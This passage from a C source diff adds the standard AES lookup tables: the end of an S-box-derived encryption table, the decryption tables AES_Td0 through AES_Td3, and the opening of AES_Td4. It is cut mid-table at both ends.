0x51515151U, 0xa3a3a3a3U, 0x40404040U, 0x8f8f8f8fU, + 0x92929292U, 0x9d9d9d9dU, 0x38383838U, 0xf5f5f5f5U, + 0xbcbcbcbcU, 0xb6b6b6b6U, 0xdadadadaU, 0x21212121U, + 0x10101010U, 0xffffffffU, 0xf3f3f3f3U, 0xd2d2d2d2U, + 0xcdcdcdcdU, 0x0c0c0c0cU, 0x13131313U, 0xececececU, + 0x5f5f5f5fU, 0x97979797U, 0x44444444U, 0x17171717U, + 0xc4c4c4c4U, 0xa7a7a7a7U, 0x7e7e7e7eU, 0x3d3d3d3dU, + 0x64646464U, 0x5d5d5d5dU, 0x19191919U, 0x73737373U, + 0x60606060U, 0x81818181U, 0x4f4f4f4fU, 0xdcdcdcdcU, + 0x22222222U, 0x2a2a2a2aU, 0x90909090U, 0x88888888U, + 0x46464646U, 0xeeeeeeeeU, 0xb8b8b8b8U, 0x14141414U, + 0xdedededeU, 0x5e5e5e5eU, 0x0b0b0b0bU, 0xdbdbdbdbU, + 0xe0e0e0e0U, 0x32323232U, 0x3a3a3a3aU, 0x0a0a0a0aU, + 0x49494949U, 0x06060606U, 0x24242424U, 0x5c5c5c5cU, + 0xc2c2c2c2U, 0xd3d3d3d3U, 0xacacacacU, 0x62626262U, + 0x91919191U, 0x95959595U, 0xe4e4e4e4U, 0x79797979U, + 0xe7e7e7e7U, 0xc8c8c8c8U, 0x37373737U, 0x6d6d6d6dU, + 0x8d8d8d8dU, 0xd5d5d5d5U, 0x4e4e4e4eU, 0xa9a9a9a9U, + 0x6c6c6c6cU, 
0x56565656U, 0xf4f4f4f4U, 0xeaeaeaeaU, + 0x65656565U, 0x7a7a7a7aU, 0xaeaeaeaeU, 0x08080808U, + 0xbabababaU, 0x78787878U, 0x25252525U, 0x2e2e2e2eU, + 0x1c1c1c1cU, 0xa6a6a6a6U, 0xb4b4b4b4U, 0xc6c6c6c6U, + 0xe8e8e8e8U, 0xddddddddU, 0x74747474U, 0x1f1f1f1fU, + 0x4b4b4b4bU, 0xbdbdbdbdU, 0x8b8b8b8bU, 0x8a8a8a8aU, + 0x70707070U, 0x3e3e3e3eU, 0xb5b5b5b5U, 0x66666666U, + 0x48484848U, 0x03030303U, 0xf6f6f6f6U, 0x0e0e0e0eU, + 0x61616161U, 0x35353535U, 0x57575757U, 0xb9b9b9b9U, + 0x86868686U, 0xc1c1c1c1U, 0x1d1d1d1dU, 0x9e9e9e9eU, + 0xe1e1e1e1U, 0xf8f8f8f8U, 0x98989898U, 0x11111111U, + 0x69696969U, 0xd9d9d9d9U, 0x8e8e8e8eU, 0x94949494U, + 0x9b9b9b9bU, 0x1e1e1e1eU, 0x87878787U, 0xe9e9e9e9U, + 0xcecececeU, 0x55555555U, 0x28282828U, 0xdfdfdfdfU, + 0x8c8c8c8cU, 0xa1a1a1a1U, 0x89898989U, 0x0d0d0d0dU, + 0xbfbfbfbfU, 0xe6e6e6e6U, 0x42424242U, 0x68686868U, + 0x41414141U, 0x99999999U, 0x2d2d2d2dU, 0x0f0f0f0fU, + 0xb0b0b0b0U, 0x54545454U, 0xbbbbbbbbU, 0x16161616U, +}; +const uint32_t AES_Td0[256] = { + 0x51f4a750U, 0x7e416553U, 0x1a17a4c3U, 0x3a275e96U, + 0x3bab6bcbU, 0x1f9d45f1U, 0xacfa58abU, 0x4be30393U, + 0x2030fa55U, 0xad766df6U, 0x88cc7691U, 0xf5024c25U, + 0x4fe5d7fcU, 0xc52acbd7U, 0x26354480U, 0xb562a38fU, + 0xdeb15a49U, 0x25ba1b67U, 0x45ea0e98U, 0x5dfec0e1U, + 0xc32f7502U, 0x814cf012U, 0x8d4697a3U, 0x6bd3f9c6U, + 0x038f5fe7U, 0x15929c95U, 0xbf6d7aebU, 0x955259daU, + 0xd4be832dU, 0x587421d3U, 0x49e06929U, 0x8ec9c844U, + 0x75c2896aU, 0xf48e7978U, 0x99583e6bU, 0x27b971ddU, + 0xbee14fb6U, 0xf088ad17U, 0xc920ac66U, 0x7dce3ab4U, + 0x63df4a18U, 0xe51a3182U, 0x97513360U, 0x62537f45U, + 0xb16477e0U, 0xbb6bae84U, 0xfe81a01cU, 0xf9082b94U, + 0x70486858U, 0x8f45fd19U, 0x94de6c87U, 0x527bf8b7U, + 0xab73d323U, 0x724b02e2U, 0xe31f8f57U, 0x6655ab2aU, + 0xb2eb2807U, 0x2fb5c203U, 0x86c57b9aU, 0xd33708a5U, + 0x302887f2U, 0x23bfa5b2U, 0x02036abaU, 0xed16825cU, + 0x8acf1c2bU, 0xa779b492U, 0xf307f2f0U, 0x4e69e2a1U, + 0x65daf4cdU, 0x0605bed5U, 0xd134621fU, 0xc4a6fe8aU, + 0x342e539dU, 0xa2f355a0U, 
0x058ae132U, 0xa4f6eb75U, + 0x0b83ec39U, 0x4060efaaU, 0x5e719f06U, 0xbd6e1051U, + 0x3e218af9U, 0x96dd063dU, 0xdd3e05aeU, 0x4de6bd46U, + 0x91548db5U, 0x71c45d05U, 0x0406d46fU, 0x605015ffU, + 0x1998fb24U, 0xd6bde997U, 0x894043ccU, 0x67d99e77U, + 0xb0e842bdU, 0x07898b88U, 0xe7195b38U, 0x79c8eedbU, + 0xa17c0a47U, 0x7c420fe9U, 0xf8841ec9U, 0x00000000U, + 0x09808683U, 0x322bed48U, 0x1e1170acU, 0x6c5a724eU, + 0xfd0efffbU, 0x0f853856U, 0x3daed51eU, 0x362d3927U, + 0x0a0fd964U, 0x685ca621U, 0x9b5b54d1U, 0x24362e3aU, + 0x0c0a67b1U, 0x9357e70fU, 0xb4ee96d2U, 0x1b9b919eU, + 0x80c0c54fU, 0x61dc20a2U, 0x5a774b69U, 0x1c121a16U, + 0xe293ba0aU, 0xc0a02ae5U, 0x3c22e043U, 0x121b171dU, + 0x0e090d0bU, 0xf28bc7adU, 0x2db6a8b9U, 0x141ea9c8U, + 0x57f11985U, 0xaf75074cU, 0xee99ddbbU, 0xa37f60fdU, + 0xf701269fU, 0x5c72f5bcU, 0x44663bc5U, 0x5bfb7e34U, + 0x8b432976U, 0xcb23c6dcU, 0xb6edfc68U, 0xb8e4f163U, + 0xd731dccaU, 0x42638510U, 0x13972240U, 0x84c61120U, + 0x854a247dU, 0xd2bb3df8U, 0xaef93211U, 0xc729a16dU, + 0x1d9e2f4bU, 0xdcb230f3U, 0x0d8652ecU, 0x77c1e3d0U, + 0x2bb3166cU, 0xa970b999U, 0x119448faU, 0x47e96422U, + 0xa8fc8cc4U, 0xa0f03f1aU, 0x567d2cd8U, 0x223390efU, + 0x87494ec7U, 0xd938d1c1U, 0x8ccaa2feU, 0x98d40b36U, + 0xa6f581cfU, 0xa57ade28U, 0xdab78e26U, 0x3fadbfa4U, + 0x2c3a9de4U, 0x5078920dU, 0x6a5fcc9bU, 0x547e4662U, + 0xf68d13c2U, 0x90d8b8e8U, 0x2e39f75eU, 0x82c3aff5U, + 0x9f5d80beU, 0x69d0937cU, 0x6fd52da9U, 0xcf2512b3U, + 0xc8ac993bU, 0x10187da7U, 0xe89c636eU, 0xdb3bbb7bU, + 0xcd267809U, 0x6e5918f4U, 0xec9ab701U, 0x834f9aa8U, + 0xe6956e65U, 0xaaffe67eU, 0x21bccf08U, 0xef15e8e6U, + 0xbae79bd9U, 0x4a6f36ceU, 0xea9f09d4U, 0x29b07cd6U, + 0x31a4b2afU, 0x2a3f2331U, 0xc6a59430U, 0x35a266c0U, + 0x744ebc37U, 0xfc82caa6U, 0xe090d0b0U, 0x33a7d815U, + 0xf104984aU, 0x41ecdaf7U, 0x7fcd500eU, 0x1791f62fU, + 0x764dd68dU, 0x43efb04dU, 0xccaa4d54U, 0xe49604dfU, + 0x9ed1b5e3U, 0x4c6a881bU, 0xc12c1fb8U, 0x4665517fU, + 0x9d5eea04U, 0x018c355dU, 0xfa877473U, 0xfb0b412eU, + 0xb3671d5aU, 0x92dbd252U, 
0xe9105633U, 0x6dd64713U, + 0x9ad7618cU, 0x37a10c7aU, 0x59f8148eU, 0xeb133c89U, + 0xcea927eeU, 0xb761c935U, 0xe11ce5edU, 0x7a47b13cU, + 0x9cd2df59U, 0x55f2733fU, 0x1814ce79U, 0x73c737bfU, + 0x53f7cdeaU, 0x5ffdaa5bU, 0xdf3d6f14U, 0x7844db86U, + 0xcaaff381U, 0xb968c43eU, 0x3824342cU, 0xc2a3405fU, + 0x161dc372U, 0xbce2250cU, 0x283c498bU, 0xff0d9541U, + 0x39a80171U, 0x080cb3deU, 0xd8b4e49cU, 0x6456c190U, + 0x7bcb8461U, 0xd532b670U, 0x486c5c74U, 0xd0b85742U, +}; +const uint32_t AES_Td1[256] = { + 0x5051f4a7U, 0x537e4165U, 0xc31a17a4U, 0x963a275eU, + 0xcb3bab6bU, 0xf11f9d45U, 0xabacfa58U, 0x934be303U, + 0x552030faU, 0xf6ad766dU, 0x9188cc76U, 0x25f5024cU, + 0xfc4fe5d7U, 0xd7c52acbU, 0x80263544U, 0x8fb562a3U, + 0x49deb15aU, 0x6725ba1bU, 0x9845ea0eU, 0xe15dfec0U, + 0x02c32f75U, 0x12814cf0U, 0xa38d4697U, 0xc66bd3f9U, + 0xe7038f5fU, 0x9515929cU, 0xebbf6d7aU, 0xda955259U, + 0x2dd4be83U, 0xd3587421U, 0x2949e069U, 0x448ec9c8U, + 0x6a75c289U, 0x78f48e79U, 0x6b99583eU, 0xdd27b971U, + 0xb6bee14fU, 0x17f088adU, 0x66c920acU, 0xb47dce3aU, + 0x1863df4aU, 0x82e51a31U, 0x60975133U, 0x4562537fU, + 0xe0b16477U, 0x84bb6baeU, 0x1cfe81a0U, 0x94f9082bU, + 0x58704868U, 0x198f45fdU, 0x8794de6cU, 0xb7527bf8U, + 0x23ab73d3U, 0xe2724b02U, 0x57e31f8fU, 0x2a6655abU, + 0x07b2eb28U, 0x032fb5c2U, 0x9a86c57bU, 0xa5d33708U, + 0xf2302887U, 0xb223bfa5U, 0xba02036aU, 0x5ced1682U, + 0x2b8acf1cU, 0x92a779b4U, 0xf0f307f2U, 0xa14e69e2U, + 0xcd65daf4U, 0xd50605beU, 0x1fd13462U, 0x8ac4a6feU, + 0x9d342e53U, 0xa0a2f355U, 0x32058ae1U, 0x75a4f6ebU, + 0x390b83ecU, 0xaa4060efU, 0x065e719fU, 0x51bd6e10U, + 0xf93e218aU, 0x3d96dd06U, 0xaedd3e05U, 0x464de6bdU, + 0xb591548dU, 0x0571c45dU, 0x6f0406d4U, 0xff605015U, + 0x241998fbU, 0x97d6bde9U, 0xcc894043U, 0x7767d99eU, + 0xbdb0e842U, 0x8807898bU, 0x38e7195bU, 0xdb79c8eeU, + 0x47a17c0aU, 0xe97c420fU, 0xc9f8841eU, 0x00000000U, + 0x83098086U, 0x48322bedU, 0xac1e1170U, 0x4e6c5a72U, + 0xfbfd0effU, 0x560f8538U, 0x1e3daed5U, 0x27362d39U, + 0x640a0fd9U, 0x21685ca6U, 0xd19b5b54U, 
0x3a24362eU, + 0xb10c0a67U, 0x0f9357e7U, 0xd2b4ee96U, 0x9e1b9b91U, + 0x4f80c0c5U, 0xa261dc20U, 0x695a774bU, 0x161c121aU, + 0x0ae293baU, 0xe5c0a02aU, 0x433c22e0U, 0x1d121b17U, + 0x0b0e090dU, 0xadf28bc7U, 0xb92db6a8U, 0xc8141ea9U, + 0x8557f119U, 0x4caf7507U, 0xbbee99ddU, 0xfda37f60U, + 0x9ff70126U, 0xbc5c72f5U, 0xc544663bU, 0x345bfb7eU, + 0x768b4329U, 0xdccb23c6U, 0x68b6edfcU, 0x63b8e4f1U, + 0xcad731dcU, 0x10426385U, 0x40139722U, 0x2084c611U, + 0x7d854a24U, 0xf8d2bb3dU, 0x11aef932U, 0x6dc729a1U, + 0x4b1d9e2fU, 0xf3dcb230U, 0xec0d8652U, 0xd077c1e3U, + 0x6c2bb316U, 0x99a970b9U, 0xfa119448U, 0x2247e964U, + 0xc4a8fc8cU, 0x1aa0f03fU, 0xd8567d2cU, 0xef223390U, + 0xc787494eU, 0xc1d938d1U, 0xfe8ccaa2U, 0x3698d40bU, + 0xcfa6f581U, 0x28a57adeU, 0x26dab78eU, 0xa43fadbfU, + 0xe42c3a9dU, 0x0d507892U, 0x9b6a5fccU, 0x62547e46U, + 0xc2f68d13U, 0xe890d8b8U, 0x5e2e39f7U, 0xf582c3afU, + 0xbe9f5d80U, 0x7c69d093U, 0xa96fd52dU, 0xb3cf2512U, + 0x3bc8ac99U, 0xa710187dU, 0x6ee89c63U, 0x7bdb3bbbU, + 0x09cd2678U, 0xf46e5918U, 0x01ec9ab7U, 0xa8834f9aU, + 0x65e6956eU, 0x7eaaffe6U, 0x0821bccfU, 0xe6ef15e8U, + 0xd9bae79bU, 0xce4a6f36U, 0xd4ea9f09U, 0xd629b07cU, + 0xaf31a4b2U, 0x312a3f23U, 0x30c6a594U, 0xc035a266U, + 0x37744ebcU, 0xa6fc82caU, 0xb0e090d0U, 0x1533a7d8U, + 0x4af10498U, 0xf741ecdaU, 0x0e7fcd50U, 0x2f1791f6U, + 0x8d764dd6U, 0x4d43efb0U, 0x54ccaa4dU, 0xdfe49604U, + 0xe39ed1b5U, 0x1b4c6a88U, 0xb8c12c1fU, 0x7f466551U, + 0x049d5eeaU, 0x5d018c35U, 0x73fa8774U, 0x2efb0b41U, + 0x5ab3671dU, 0x5292dbd2U, 0x33e91056U, 0x136dd647U, + 0x8c9ad761U, 0x7a37a10cU, 0x8e59f814U, 0x89eb133cU, + 0xeecea927U, 0x35b761c9U, 0xede11ce5U, 0x3c7a47b1U, + 0x599cd2dfU, 0x3f55f273U, 0x791814ceU, 0xbf73c737U, + 0xea53f7cdU, 0x5b5ffdaaU, 0x14df3d6fU, 0x867844dbU, + 0x81caaff3U, 0x3eb968c4U, 0x2c382434U, 0x5fc2a340U, + 0x72161dc3U, 0x0cbce225U, 0x8b283c49U, 0x41ff0d95U, + 0x7139a801U, 0xde080cb3U, 0x9cd8b4e4U, 0x906456c1U, + 0x617bcb84U, 0x70d532b6U, 0x74486c5cU, 0x42d0b857U, +}; +const uint32_t AES_Td2[256] = { + 
0xa75051f4U, 0x65537e41U, 0xa4c31a17U, 0x5e963a27U, + 0x6bcb3babU, 0x45f11f9dU, 0x58abacfaU, 0x03934be3U, + 0xfa552030U, 0x6df6ad76U, 0x769188ccU, 0x4c25f502U, + 0xd7fc4fe5U, 0xcbd7c52aU, 0x44802635U, 0xa38fb562U, + 0x5a49deb1U, 0x1b6725baU, 0x0e9845eaU, 0xc0e15dfeU, + 0x7502c32fU, 0xf012814cU, 0x97a38d46U, 0xf9c66bd3U, + 0x5fe7038fU, 0x9c951592U, 0x7aebbf6dU, 0x59da9552U, + 0x832dd4beU, 0x21d35874U, 0x692949e0U, 0xc8448ec9U, + 0x896a75c2U, 0x7978f48eU, 0x3e6b9958U, 0x71dd27b9U, + 0x4fb6bee1U, 0xad17f088U, 0xac66c920U, 0x3ab47dceU, + 0x4a1863dfU, 0x3182e51aU, 0x33609751U, 0x7f456253U, + 0x77e0b164U, 0xae84bb6bU, 0xa01cfe81U, 0x2b94f908U, + 0x68587048U, 0xfd198f45U, 0x6c8794deU, 0xf8b7527bU, + 0xd323ab73U, 0x02e2724bU, 0x8f57e31fU, 0xab2a6655U, + 0x2807b2ebU, 0xc2032fb5U, 0x7b9a86c5U, 0x08a5d337U, + 0x87f23028U, 0xa5b223bfU, 0x6aba0203U, 0x825ced16U, + 0x1c2b8acfU, 0xb492a779U, 0xf2f0f307U, 0xe2a14e69U, + 0xf4cd65daU, 0xbed50605U, 0x621fd134U, 0xfe8ac4a6U, + 0x539d342eU, 0x55a0a2f3U, 0xe132058aU, 0xeb75a4f6U, + 0xec390b83U, 0xefaa4060U, 0x9f065e71U, 0x1051bd6eU, + + 0x8af93e21U, 0x063d96ddU, 0x05aedd3eU, 0xbd464de6U, + 0x8db59154U, 0x5d0571c4U, 0xd46f0406U, 0x15ff6050U, + 0xfb241998U, 0xe997d6bdU, 0x43cc8940U, 0x9e7767d9U, + 0x42bdb0e8U, 0x8b880789U, 0x5b38e719U, 0xeedb79c8U, + 0x0a47a17cU, 0x0fe97c42U, 0x1ec9f884U, 0x00000000U, + 0x86830980U, 0xed48322bU, 0x70ac1e11U, 0x724e6c5aU, + 0xfffbfd0eU, 0x38560f85U, 0xd51e3daeU, 0x3927362dU, + 0xd9640a0fU, 0xa621685cU, 0x54d19b5bU, 0x2e3a2436U, + 0x67b10c0aU, 0xe70f9357U, 0x96d2b4eeU, 0x919e1b9bU, + 0xc54f80c0U, 0x20a261dcU, 0x4b695a77U, 0x1a161c12U, + 0xba0ae293U, 0x2ae5c0a0U, 0xe0433c22U, 0x171d121bU, + 0x0d0b0e09U, 0xc7adf28bU, 0xa8b92db6U, 0xa9c8141eU, + 0x198557f1U, 0x074caf75U, 0xddbbee99U, 0x60fda37fU, + 0x269ff701U, 0xf5bc5c72U, 0x3bc54466U, 0x7e345bfbU, + 0x29768b43U, 0xc6dccb23U, 0xfc68b6edU, 0xf163b8e4U, + 0xdccad731U, 0x85104263U, 0x22401397U, 0x112084c6U, + 0x247d854aU, 0x3df8d2bbU, 0x3211aef9U, 0xa16dc729U, + 
0x2f4b1d9eU, 0x30f3dcb2U, 0x52ec0d86U, 0xe3d077c1U, + 0x166c2bb3U, 0xb999a970U, 0x48fa1194U, 0x642247e9U, + 0x8cc4a8fcU, 0x3f1aa0f0U, 0x2cd8567dU, 0x90ef2233U, + 0x4ec78749U, 0xd1c1d938U, 0xa2fe8ccaU, 0x0b3698d4U, + 0x81cfa6f5U, 0xde28a57aU, 0x8e26dab7U, 0xbfa43fadU, + 0x9de42c3aU, 0x920d5078U, 0xcc9b6a5fU, 0x4662547eU, + 0x13c2f68dU, 0xb8e890d8U, 0xf75e2e39U, 0xaff582c3U, + 0x80be9f5dU, 0x937c69d0U, 0x2da96fd5U, 0x12b3cf25U, + 0x993bc8acU, 0x7da71018U, 0x636ee89cU, 0xbb7bdb3bU, + 0x7809cd26U, 0x18f46e59U, 0xb701ec9aU, 0x9aa8834fU, + 0x6e65e695U, 0xe67eaaffU, 0xcf0821bcU, 0xe8e6ef15U, + 0x9bd9bae7U, 0x36ce4a6fU, 0x09d4ea9fU, 0x7cd629b0U, + 0xb2af31a4U, 0x23312a3fU, 0x9430c6a5U, 0x66c035a2U, + 0xbc37744eU, 0xcaa6fc82U, 0xd0b0e090U, 0xd81533a7U, + 0x984af104U, 0xdaf741ecU, 0x500e7fcdU, 0xf62f1791U, + 0xd68d764dU, 0xb04d43efU, 0x4d54ccaaU, 0x04dfe496U, + 0xb5e39ed1U, 0x881b4c6aU, 0x1fb8c12cU, 0x517f4665U, + 0xea049d5eU, 0x355d018cU, 0x7473fa87U, 0x412efb0bU, + 0x1d5ab367U, 0xd25292dbU, 0x5633e910U, 0x47136dd6U, + 0x618c9ad7U, 0x0c7a37a1U, 0x148e59f8U, 0x3c89eb13U, + 0x27eecea9U, 0xc935b761U, 0xe5ede11cU, 0xb13c7a47U, + 0xdf599cd2U, 0x733f55f2U, 0xce791814U, 0x37bf73c7U, + 0xcdea53f7U, 0xaa5b5ffdU, 0x6f14df3dU, 0xdb867844U, + 0xf381caafU, 0xc43eb968U, 0x342c3824U, 0x405fc2a3U, + 0xc372161dU, 0x250cbce2U, 0x498b283cU, 0x9541ff0dU, + 0x017139a8U, 0xb3de080cU, 0xe49cd8b4U, 0xc1906456U, + 0x84617bcbU, 0xb670d532U, 0x5c74486cU, 0x5742d0b8U, +}; +const uint32_t AES_Td3[256] = { + 0xf4a75051U, 0x4165537eU, 0x17a4c31aU, 0x275e963aU, + 0xab6bcb3bU, 0x9d45f11fU, 0xfa58abacU, 0xe303934bU, + 0x30fa5520U, 0x766df6adU, 0xcc769188U, 0x024c25f5U, + 0xe5d7fc4fU, 0x2acbd7c5U, 0x35448026U, 0x62a38fb5U, + 0xb15a49deU, 0xba1b6725U, 0xea0e9845U, 0xfec0e15dU, + 0x2f7502c3U, 0x4cf01281U, 0x4697a38dU, 0xd3f9c66bU, + 0x8f5fe703U, 0x929c9515U, 0x6d7aebbfU, 0x5259da95U, + 0xbe832dd4U, 0x7421d358U, 0xe0692949U, 0xc9c8448eU, + 0xc2896a75U, 0x8e7978f4U, 0x583e6b99U, 0xb971dd27U, + 0xe14fb6beU, 
0x88ad17f0U, 0x20ac66c9U, 0xce3ab47dU, + 0xdf4a1863U, 0x1a3182e5U, 0x51336097U, 0x537f4562U, + 0x6477e0b1U, 0x6bae84bbU, 0x81a01cfeU, 0x082b94f9U, + 0x48685870U, 0x45fd198fU, 0xde6c8794U, 0x7bf8b752U, + 0x73d323abU, 0x4b02e272U, 0x1f8f57e3U, 0x55ab2a66U, + 0xeb2807b2U, 0xb5c2032fU, 0xc57b9a86U, 0x3708a5d3U, + 0x2887f230U, 0xbfa5b223U, 0x036aba02U, 0x16825cedU, + 0xcf1c2b8aU, 0x79b492a7U, 0x07f2f0f3U, 0x69e2a14eU, + 0xdaf4cd65U, 0x05bed506U, 0x34621fd1U, 0xa6fe8ac4U, + 0x2e539d34U, 0xf355a0a2U, 0x8ae13205U, 0xf6eb75a4U, + 0x83ec390bU, 0x60efaa40U, 0x719f065eU, 0x6e1051bdU, + 0x218af93eU, 0xdd063d96U, 0x3e05aeddU, 0xe6bd464dU, + 0x548db591U, 0xc45d0571U, 0x06d46f04U, 0x5015ff60U, + 0x98fb2419U, 0xbde997d6U, 0x4043cc89U, 0xd99e7767U, + 0xe842bdb0U, 0x898b8807U, 0x195b38e7U, 0xc8eedb79U, + 0x7c0a47a1U, 0x420fe97cU, 0x841ec9f8U, 0x00000000U, + 0x80868309U, 0x2bed4832U, 0x1170ac1eU, 0x5a724e6cU, + 0x0efffbfdU, 0x8538560fU, 0xaed51e3dU, 0x2d392736U, + 0x0fd9640aU, 0x5ca62168U, 0x5b54d19bU, 0x362e3a24U, + 0x0a67b10cU, 0x57e70f93U, 0xee96d2b4U, 0x9b919e1bU, + 0xc0c54f80U, 0xdc20a261U, 0x774b695aU, 0x121a161cU, + 0x93ba0ae2U, 0xa02ae5c0U, 0x22e0433cU, 0x1b171d12U, + 0x090d0b0eU, 0x8bc7adf2U, 0xb6a8b92dU, 0x1ea9c814U, + 0xf1198557U, 0x75074cafU, 0x99ddbbeeU, 0x7f60fda3U, + 0x01269ff7U, 0x72f5bc5cU, 0x663bc544U, 0xfb7e345bU, + 0x4329768bU, 0x23c6dccbU, 0xedfc68b6U, 0xe4f163b8U, + 0x31dccad7U, 0x63851042U, 0x97224013U, 0xc6112084U, + 0x4a247d85U, 0xbb3df8d2U, 0xf93211aeU, 0x29a16dc7U, + 0x9e2f4b1dU, 0xb230f3dcU, 0x8652ec0dU, 0xc1e3d077U, + 0xb3166c2bU, 0x70b999a9U, 0x9448fa11U, 0xe9642247U, + 0xfc8cc4a8U, 0xf03f1aa0U, 0x7d2cd856U, 0x3390ef22U, + 0x494ec787U, 0x38d1c1d9U, 0xcaa2fe8cU, 0xd40b3698U, + 0xf581cfa6U, 0x7ade28a5U, 0xb78e26daU, 0xadbfa43fU, + 0x3a9de42cU, 0x78920d50U, 0x5fcc9b6aU, 0x7e466254U, + 0x8d13c2f6U, 0xd8b8e890U, 0x39f75e2eU, 0xc3aff582U, + 0x5d80be9fU, 0xd0937c69U, 0xd52da96fU, 0x2512b3cfU, + 0xac993bc8U, 0x187da710U, 0x9c636ee8U, 0x3bbb7bdbU, + 0x267809cdU, 
0x5918f46eU, 0x9ab701ecU, 0x4f9aa883U, + 0x956e65e6U, 0xffe67eaaU, 0xbccf0821U, 0x15e8e6efU, + 0xe79bd9baU, 0x6f36ce4aU, 0x9f09d4eaU, 0xb07cd629U, + 0xa4b2af31U, 0x3f23312aU, 0xa59430c6U, 0xa266c035U, + 0x4ebc3774U, 0x82caa6fcU, 0x90d0b0e0U, 0xa7d81533U, + 0x04984af1U, 0xecdaf741U, 0xcd500e7fU, 0x91f62f17U, + 0x4dd68d76U, 0xefb04d43U, 0xaa4d54ccU, 0x9604dfe4U, + 0xd1b5e39eU, 0x6a881b4cU, 0x2c1fb8c1U, 0x65517f46U, + 0x5eea049dU, 0x8c355d01U, 0x877473faU, 0x0b412efbU, + 0x671d5ab3U, 0xdbd25292U, 0x105633e9U, 0xd647136dU, + 0xd7618c9aU, 0xa10c7a37U, 0xf8148e59U, 0x133c89ebU, + 0xa927eeceU, 0x61c935b7U, 0x1ce5ede1U, 0x47b13c7aU, + 0xd2df599cU, 0xf2733f55U, 0x14ce7918U, 0xc737bf73U, + 0xf7cdea53U, 0xfdaa5b5fU, 0x3d6f14dfU, 0x44db8678U, + 0xaff381caU, 0x68c43eb9U, 0x24342c38U, 0xa3405fc2U, + 0x1dc37216U, 0xe2250cbcU, 0x3c498b28U, 0x0d9541ffU, + 0xa8017139U, 0x0cb3de08U, 0xb4e49cd8U, 0x56c19064U, + 0xcb84617bU, 0x32b670d5U, 0x6c5c7448U, 0xb85742d0U, +}; +const uint32_t AES_Td4[256] = { + 0x52525252U, 0x09090909U, 0x6a6a6a6aU, 0xd5d5d5d5U, + 0x30303030U, 0x36363636U, 0xa5a5a5a5U, 0x38383838U, + 0xbfbfbfbfU, 0x40404040U, 0xa3a3a3a3U, 0x9e9e9e9eU, + 0x81818181U, 0xf3f3f3f3U, 0xd7d7d7d7U, 0xfbfbfbfbU, + 0x7c7c7c7cU, 0xe3e3e3e3U, 0x39393939U, 0x82828282U, + 0x9b9b9b9bU, 0x2f2f2f2fU, 0xffffffffU, 0x87878787U, + 0x34343434U, 0x8e8e8e8eU, 0x43434343U, 0x44444444U, + 0xc4c4c4c4U, 0xdedededeU, 0xe9e9e9e9U, 0xcbcbcbcbU, + 0x54545454U, 0x7b7b7b7bU, 0x94949494U, 0x32323232U, + 0xa6a6a6a6U, 0xc2c2c2c2U, 0x23232323U, 0x3d3d3d3dU, + 0xeeeeeeeeU, 0x4c4c4c4cU, 0x95959595U, 0x0b0b0b0bU, + 0x42424242U, 0xfafafafaU, 0xc3c3c3c3U, 0x4e4e4e4eU, + 0x08080808U, 0x2e2e2e2eU, 0xa1a1a1a1U, 0x66666666U, + 0x28282828U, 0xd9d9d9d9U, 0x24242424U, 0xb2b2b2b2U, + 0x76767676U, 0x5b5b5b5bU, 0xa2a2a2a2U, 0x49494949U, + 0x6d6d6d6dU, 0x8b8b8b8bU, 0xd1d1d1d1U, 0x25252525U, + 0x72727272U, 0xf8f8f8f8U, 0xf6f6f6f6U, 0x64646464U, + 0x86868686U, 0x68686868U, 0x98989898U, 0x16161616U, + 0xd4d4d4d4U, 0xa4a4a4a4U, 
0x5c5c5c5cU, 0xccccccccU, + 0x5d5d5d5dU, 0x65656565U, 0xb6b6b6b6U, 0x92929292U, + 0x6c6c6c6cU, 0x70707070U, 0x48484848U, 0x50505050U, + 0xfdfdfdfdU, 0xededededU, 0xb9b9b9b9U, 0xdadadadaU, + 0x5e5e5e5eU, 0x15151515U, 0x46464646U, 0x57575757U, + 0xa7a7a7a7U, 0x8d8d8d8dU, 0x9d9d9d9dU, 0x84848484U, + 0x90909090U, 0xd8d8d8d8U, 0xababababU, 0x00000000U, + 0x8c8c8c8cU, 0xbcbcbcbcU, 0xd3d3d3d3U, 0x0a0a0a0aU, + 0xf7f7f7f7U, 0xe4e4e4e4U, 0x58585858U, 0x05050505U, + 0xb8b8b8b8U, 0xb3b3b3b3U, 0x45454545U, 0x06060606U, + 0xd0d0d0d0U, 0x2c2c2c2cU, 0x1e1e1e1eU, 0x8f8f8f8fU, + 0xcacacacaU, 0x3f3f3f3fU, 0x0f0f0f0fU, 0x02020202U, + 0xc1c1c1c1U, 0xafafafafU, 0xbdbdbdbdU, 0x03030303U, + 0x01010101U, 0x13131313U, 0x8a8a8a8aU, 0x6b6b6b6bU, + 0x3a3a3a3aU, 0x91919191U, 0x11111111U, 0x41414141U, + 0x4f4f4f4fU, 0x67676767U, 0xdcdcdcdcU, 0xeaeaeaeaU, + 0x97979797U, 0xf2f2f2f2U, 0xcfcfcfcfU, 0xcecececeU, + 0xf0f0f0f0U, 0xb4b4b4b4U, 0xe6e6e6e6U, 0x73737373U, + 0x96969696U, 0xacacacacU, 0x74747474U, 0x22222222U, + 0xe7e7e7e7U, 0xadadadadU, 0x35353535U, 0x85858585U, + 0xe2e2e2e2U, 0xf9f9f9f9U, 0x37373737U, 0xe8e8e8e8U, + 0x1c1c1c1cU, 0x75757575U, 0xdfdfdfdfU, 0x6e6e6e6eU, + 0x47474747U, 0xf1f1f1f1U, 0x1a1a1a1aU, 0x71717171U, + 0x1d1d1d1dU, 0x29292929U, 0xc5c5c5c5U, 0x89898989U, + 0x6f6f6f6fU, 0xb7b7b7b7U, 0x62626262U, 0x0e0e0e0eU, + 0xaaaaaaaaU, 0x18181818U, 0xbebebebeU, 0x1b1b1b1bU, + 0xfcfcfcfcU, 0x56565656U, 0x3e3e3e3eU, 0x4b4b4b4bU, + 0xc6c6c6c6U, 0xd2d2d2d2U, 0x79797979U, 0x20202020U, + 0x9a9a9a9aU, 0xdbdbdbdbU, 0xc0c0c0c0U, 0xfefefefeU, + 0x78787878U, 0xcdcdcdcdU, 0x5a5a5a5aU, 0xf4f4f4f4U, + 0x1f1f1f1fU, 0xddddddddU, 0xa8a8a8a8U, 0x33333333U, + 0x88888888U, 0x07070707U, 0xc7c7c7c7U, 0x31313131U, + 0xb1b1b1b1U, 0x12121212U, 0x10101010U, 0x59595959U, + 0x27272727U, 0x80808080U, 0xececececU, 0x5f5f5f5fU, + 0x60606060U, 0x51515151U, 0x7f7f7f7fU, 0xa9a9a9a9U, + 0x19191919U, 0xb5b5b5b5U, 0x4a4a4a4aU, 0x0d0d0d0dU, + 0x2d2d2d2dU, 